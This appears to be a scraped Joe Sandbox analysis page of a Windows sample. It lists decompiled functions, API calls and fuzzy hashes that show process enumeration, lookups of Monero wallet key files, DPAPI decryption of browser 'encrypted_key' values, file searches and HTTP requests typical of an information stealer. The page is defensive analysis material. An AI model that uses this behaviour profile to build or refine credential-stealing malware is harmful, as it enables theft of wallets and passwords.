Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: c22a8086a3b7d89e63452144b89970d98ee76e7873585fcc8903afcdc009c25a
Instruction ID: 27f409486f347dbd94cfcd26e9be7b6d330756ec1c00d9acfa78d7e48066f64d
Opcode Fuzzy Hash: c22a8086a3b7d89e63452144b89970d98ee76e7873585fcc8903afcdc009c25a
Instruction Fuzzy Hash: 6D3125B5E10109EBDF14DBE4DC85AEF77BCBF44304F544529EA06A7241E7389A05CBA1

Function 00778680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007805B7), ref: 007786CA
Process32First.KERNEL32(?,00000128), ref: 007786DE
Process32Next.KERNEL32(?,00000128), ref: 007786F3

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

CloseHandle.KERNEL32(?), ref: 00778761

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: dd6e94937c15ae2385887727d4d65e6d9367ab0bed9b62c7290f07dc06825de2
Instruction ID: 2ecefc3121959cb8b174b1617c4d6f8c49f8687092ab1a7aa06ca18d6e33470e
Opcode Fuzzy Hash: dd6e94937c15ae2385887727d4d65e6d9367ab0bed9b62c7290f07dc06825de2
Instruction Fuzzy Hash: DD316F71901218EBDF65DF54CC49FEEB778EF45740F108199E10EA21A0DB386A45CFA2

Function 00776AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01259178,?,0078110C,?,00000000,?,00781110,?,00000000,00780AEF), ref: 00776ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00776AE8
CloseHandle.KERNEL32(00000000), ref: 00776AF9
Sleep.KERNEL32(00001770), ref: 00776B04
CloseHandle.KERNEL32(?,00000000,?,01259178,?,0078110C,?,00000000,?,00781110,?,00000000,00780AEF), ref: 00776B1A
ExitProcess.KERNEL32 ref: 00776B22

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: edc1ecf26e6ce31dca264f4fc405fb1d48724f38c43bb60ca849f2b277e7e46e
Instruction ID: ddc7daaf98ce29396a83c06c34b122bbdc19ed1014838e640ef473723d9f787f
Opcode Fuzzy Hash: edc1ecf26e6ce31dca264f4fc405fb1d48724f38c43bb60ca849f2b277e7e46e
Instruction Fuzzy Hash: CBF05E70944609EFEF40BBA0DC0ABBE7B34EF05781F20C514B50AA11D5CBB85540EAA6

Function 007647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

Strings

<, xrefs: 007647C9

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: b8dcce76f6994002b065511caafcb11b679118a54efbe784a849e6fd97d3db64
Instruction ID: 98b66e3c280f2359cd9b1071dcbf6486211ca0d9870bd158dba7deede27bee2d
Opcode Fuzzy Hash: b8dcce76f6994002b065511caafcb11b679118a54efbe784a849e6fd97d3db64
Instruction Fuzzy Hash: A5214DB1D00209ABDF14DFA4E949ADE7B74FF45320F108629F929A72C0EB746A05CF91

Function 007751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 00766280: InternetOpenA.WININET(00780DFE,00000001,00000000,00000000,00000000), ref: 007662E1
Part of subcall function 00766280: StrCmpCA.SHLWAPI(?,0125E978), ref: 00766303
Part of subcall function 00766280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00766335
Part of subcall function 00766280: HttpOpenRequestA.WININET(00000000,GET,?,0125E230,00000000,00000000,00400100,00000000), ref: 00766385
Part of subcall function 00766280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007663BF
Part of subcall function 00766280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007663D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00775228

Strings

ERROR, xrefs: 00775273
ERROR, xrefs: 0077521A

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: e5c97a4d3cd548d86cdd140058032464ccc94d478c288080f52a98cc3621188e
Instruction ID: 5e65521950763f3b8900c56b689b090aeaac9ff638829a5b362f83ebb3aaef6f
Opcode Fuzzy Hash: e5c97a4d3cd548d86cdd140058032464ccc94d478c288080f52a98cc3621188e
Instruction Fuzzy Hash: 84110D70910008FADF14FB64DD5AAED7378AF90380F80C168F81E4A592EF386B06C792

Function 00774F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 00774F7A
lstrcat.KERNEL32(?,00781070), ref: 00774F97
lstrcat.KERNEL32(?,01258F08), ref: 00774FAB
lstrcat.KERNEL32(?,00781074), ref: 00774FBD

Part of subcall function 00774910: wsprintfA.USER32 ref: 0077492C
Part of subcall function 00774910: FindFirstFileA.KERNEL32(?,?), ref: 00774943

Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FDC), ref: 00774971
Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FE0), ref: 00774987
Part of subcall function 00774910: FindNextFileA.KERNEL32(000000FF,?), ref: 00774B7D
Part of subcall function 00774910: FindClose.KERNEL32(000000FF), ref: 00774B92

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a2eb907bca3f3c566a16e49ddaa5774531e562c6a0362a9eec3f621882666167
Instruction ID: 07b5ee9782836cead15e6c25d6b5bd504bc5772a8b90713053de474b6bbf5b11
Opcode Fuzzy Hash: a2eb907bca3f3c566a16e49ddaa5774531e562c6a0362a9eec3f621882666167
Instruction Fuzzy Hash: E221D8B6914204A7CB94FB60DC4AEED333CAB55300F408554B64A92181EF78AAC8CBD3

Function 00770740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01258FB8), ref: 0077079A
StrCmpCA.SHLWAPI(00000000,01259008), ref: 00770866
StrCmpCA.SHLWAPI(00000000,01258EB8), ref: 0077099D

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 493aebe99a31cea14b3a9ba9e025cd9323f9ede247eada0e4289b6e2f40e80e5
Instruction ID: c3591ecf92bb28802298c5bcfa25a2cb3d070634425916e7743f14587dec7396
Opcode Fuzzy Hash: 493aebe99a31cea14b3a9ba9e025cd9323f9ede247eada0e4289b6e2f40e80e5
Instruction Fuzzy Hash: 89917775A10208EFDF18EF64D995AEDB7B5BF94340F40C529E80E8B241DB34AA05CBD2

Function 00770765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01258FB8), ref: 0077079A
StrCmpCA.SHLWAPI(00000000,01259008), ref: 00770866
StrCmpCA.SHLWAPI(00000000,01258EB8), ref: 0077099D

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 95d759bfc830274fc86c174cf660c75e6a2e7d1813462dd8b4f93451219dd016
